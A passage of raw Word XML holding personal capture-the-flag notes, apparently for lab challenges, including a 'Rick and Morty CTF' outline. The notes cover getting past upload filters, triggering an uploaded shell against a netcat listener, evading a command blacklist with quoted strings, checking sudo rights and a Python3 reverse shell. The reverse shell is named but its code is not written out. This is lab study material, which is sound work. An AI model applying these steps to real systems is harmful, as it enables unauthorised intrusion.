      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find upload.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821F9F6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Do Intercept Server Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F3A24" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Will Catch JS Script for Client-Side Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE666F3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Yoink out Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B083305" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Re-Attempt Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A303D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Will fail if Server-Side Filter is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3983CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Since Client-Side used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B824209" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2C490F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB8C9B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Magic Numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DED13" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What is left?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CD8C8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MIME type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63653331" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Change file type to match extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69C408" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AFTER SUCCESSFUL BYPASS OF FILTERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40922998" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Re-do gobuster search for jpgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42527905" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Compare output with first scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F9959F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>New File added will be Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDE8AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Setup netcat listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F040EB1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Go to admin page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4479C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Input file path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C0511" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>../content/&lt;filename&gt;/.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB050A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D1C63" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Connection should be made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86CDF1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Whoami and id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097776F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hostname -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCDB1D8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C811D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Navigate and find flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162009D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BE6106" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rick and Morty CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D02CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Curl “http://&lt;ip&gt;/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B80D087" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CCC061" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gobuster for directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD3451" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Explore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CCAA46" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Try different extensions of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACDE4D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Less, more commands in addition to cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D90384" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Blacklisted command &gt; grep -R “”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068D890" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Inspect source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148DEA8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypass blacklisted command by using a string in the middle of a command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392C4C6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>In burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093AF6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cat vs c”a”t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDDE15" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFDC4A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D888B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sudo ls ../../../*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C027A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Repetitious decoding of base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297F530" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rabbit hole – no bueno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5F772" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Test if python3 can be used by inputting hello world into command line with proper syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C12B56B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Python3 remote shell into command line from pentestmonkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C69E03" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cat “&lt;file&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A8D89E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Nmap scan + Source Code Review + gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B0516" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
